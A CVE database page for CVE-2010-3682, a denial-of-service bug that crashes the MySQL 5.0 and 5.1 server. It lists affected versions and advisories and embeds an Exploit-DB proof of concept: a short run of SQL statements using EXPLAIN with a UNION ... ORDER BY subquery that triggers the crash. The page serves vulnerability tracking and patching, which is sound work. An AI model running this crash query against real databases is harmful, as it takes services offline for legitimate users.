CVE-2010-3682 : Detail

CVE-2010-3682

2.6%V3
Network
2011-01-11
18h00 +00:00
2018-01-04
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 34506

Publication date : 2010-08-19 22h00 +00:00
Author : Bjorn Munch
EDB Verified : Yes

source: https://www.securityfocus.com/bid/42599/info MySQL is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the database, denying access to legitimate users. This issue affects versions prior to MySQL 5.1.49. NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. CREATE TABLE t1 (a VARCHAR(10), FULLTEXT KEY a (a)); INSERT INTO t1 VALUES (1),(2); CREATE TABLE t2 (b INT); INSERT INTO t2 VALUES (1),(2); EXPLAIN SELECT * FROM t1 UNION SELECT * FROM t1 ORDER BY (SELECT a FROM t2 WHERE b = 12); EXPLAIN SELECT * FROM t2 UNION SELECT * FROM t2 ORDER BY (SELECT * FROM t1 WHERE MATCH(a) AGAINST ('+abc' IN BOOLEAN MODE)); DROP TABLE t1,t2; exit;

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.1.48

Mysql>>Mysql >> Version 5.1.23

Mysql>>Mysql >> Version 5.1.31

Mysql>>Mysql >> Version 5.1.32

Mysql>>Mysql >> Version 5.1.34

Mysql>>Mysql >> Version 5.1.37

Oracle>>Mysql >> Version 5.1.1

Oracle>>Mysql >> Version 5.1.2

Oracle>>Mysql >> Version 5.1.3

Oracle>>Mysql >> Version 5.1.4

Oracle>>Mysql >> Version 5.1.10

Oracle>>Mysql >> Version 5.1.11

Oracle>>Mysql >> Version 5.1.12

Oracle>>Mysql >> Version 5.1.13

Oracle>>Mysql >> Version 5.1.14

Oracle>>Mysql >> Version 5.1.15

Oracle>>Mysql >> Version 5.1.16

Oracle>>Mysql >> Version 5.1.17

Oracle>>Mysql >> Version 5.1.18

Oracle>>Mysql >> Version 5.1.19

Oracle>>Mysql >> Version 5.1.20

Oracle>>Mysql >> Version 5.1.21

Oracle>>Mysql >> Version 5.1.22

Oracle>>Mysql >> Version 5.1.23

Oracle>>Mysql >> Version 5.1.24

Oracle>>Mysql >> Version 5.1.25

Oracle>>Mysql >> Version 5.1.26

Oracle>>Mysql >> Version 5.1.27

Oracle>>Mysql >> Version 5.1.28

Oracle>>Mysql >> Version 5.1.29

Oracle>>Mysql >> Version 5.1.30

Oracle>>Mysql >> Version 5.1.31

Oracle>>Mysql >> Version 5.1.33

Oracle>>Mysql >> Version 5.1.34

Oracle>>Mysql >> Version 5.1.35

Oracle>>Mysql >> Version 5.1.36

Oracle>>Mysql >> Version 5.1.37

Oracle>>Mysql >> Version 5.1.38

Oracle>>Mysql >> Version 5.1.39

Oracle>>Mysql >> Version 5.1.40

Oracle>>Mysql >> Version 5.1.40

Oracle>>Mysql >> Version 5.1.41

Oracle>>Mysql >> Version 5.1.42

Oracle>>Mysql >> Version 5.1.43

Oracle>>Mysql >> Version 5.1.43

Oracle>>Mysql >> Version 5.1.44

Oracle>>Mysql >> Version 5.1.45

Oracle>>Mysql >> Version 5.1.46

Oracle>>Mysql >> Version 5.1.46

Oracle>>Mysql >> Version 5.1.47

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.0.91

Mysql>>Mysql >> Version 5.0.0

Mysql>>Mysql >> Version 5.0.1

Mysql>>Mysql >> Version 5.0.2

Mysql>>Mysql >> Version 5.0.10

Mysql>>Mysql >> Version 5.0.15

Mysql>>Mysql >> Version 5.0.16

Mysql>>Mysql >> Version 5.0.17

Mysql>>Mysql >> Version 5.0.20

Mysql>>Mysql >> Version 5.0.24

Mysql>>Mysql >> Version 5.0.30

Mysql>>Mysql >> Version 5.0.36

Mysql>>Mysql >> Version 5.0.44

Mysql>>Mysql >> Version 5.0.54

Mysql>>Mysql >> Version 5.0.56

Mysql>>Mysql >> Version 5.0.60

Mysql>>Mysql >> Version 5.0.66

Mysql>>Mysql >> Version 5.0.72

Mysql>>Mysql >> Version 5.0.74

Mysql>>Mysql >> Version 5.0.82

Mysql>>Mysql >> Version 5.0.84

Mysql>>Mysql >> Version 5.0.87

Oracle>>Mysql >> Version 5.0.28

Oracle>>Mysql >> Version 5.0.30

Oracle>>Mysql >> Version 5.0.32

Oracle>>Mysql >> Version 5.0.34

Oracle>>Mysql >> Version 5.0.36

Oracle>>Mysql >> Version 5.0.38

Oracle>>Mysql >> Version 5.0.40

Oracle>>Mysql >> Version 5.0.41

Oracle>>Mysql >> Version 5.0.42

Oracle>>Mysql >> Version 5.0.44

Oracle>>Mysql >> Version 5.0.45

Oracle>>Mysql >> Version 5.0.46

Oracle>>Mysql >> Version 5.0.48

Oracle>>Mysql >> Version 5.0.50

Oracle>>Mysql >> Version 5.0.51

Oracle>>Mysql >> Version 5.0.51

Oracle>>Mysql >> Version 5.0.52

Oracle>>Mysql >> Version 5.0.56

Oracle>>Mysql >> Version 5.0.58

Oracle>>Mysql >> Version 5.0.62

Oracle>>Mysql >> Version 5.0.64

Oracle>>Mysql >> Version 5.0.66

Oracle>>Mysql >> Version 5.0.66

Oracle>>Mysql >> Version 5.0.67

Oracle>>Mysql >> Version 5.0.68

Oracle>>Mysql >> Version 5.0.70

Oracle>>Mysql >> Version 5.0.72

Oracle>>Mysql >> Version 5.0.74

Oracle>>Mysql >> Version 5.0.75

Oracle>>Mysql >> Version 5.0.76

Oracle>>Mysql >> Version 5.0.77

Oracle>>Mysql >> Version 5.0.78

Oracle>>Mysql >> Version 5.0.79

Oracle>>Mysql >> Version 5.0.80

Oracle>>Mysql >> Version 5.0.81

Oracle>>Mysql >> Version 5.0.82

Oracle>>Mysql >> Version 5.0.83

Oracle>>Mysql >> Version 5.0.84

Oracle>>Mysql >> Version 5.0.85

Oracle>>Mysql >> Version 5.0.86

Oracle>>Mysql >> Version 5.0.87

Oracle>>Mysql >> Version 5.0.88

Oracle>>Mysql >> Version 5.0.89

Oracle>>Mysql >> Version 5.0.90

References

http://www.ubuntu.com/usn/USN-1397-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://support.apple.com/kb/HT4723
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/42875
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-1017-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt
Tags : vendor-advisory, x_refsource_TURBO
http://www.mandriva.com/security/advisories?name=MDVSA-2011:012
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.vupen.com/english/advisories/2011/0105
Tags : vdb-entry, x_refsource_VUPEN
http://www.mandriva.com/security/advisories?name=MDVSA-2010:222
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.redhat.com/support/errata/RHSA-2011-0164.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2011/0170
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2011/0133
Tags : vdb-entry, x_refsource_VUPEN
http://www.debian.org/security/2011/dsa-2143
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.vupen.com/english/advisories/2011/0345
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/42599
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDVSA-2010:155
Tags : vendor-advisory, x_refsource_MANDRIVA
http://bugs.mysql.com/bug.php?id=52711
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/42936
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0825.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.openwall.com/lists/oss-security/2010/09/28/10
Tags : mailing-list, x_refsource_MLIST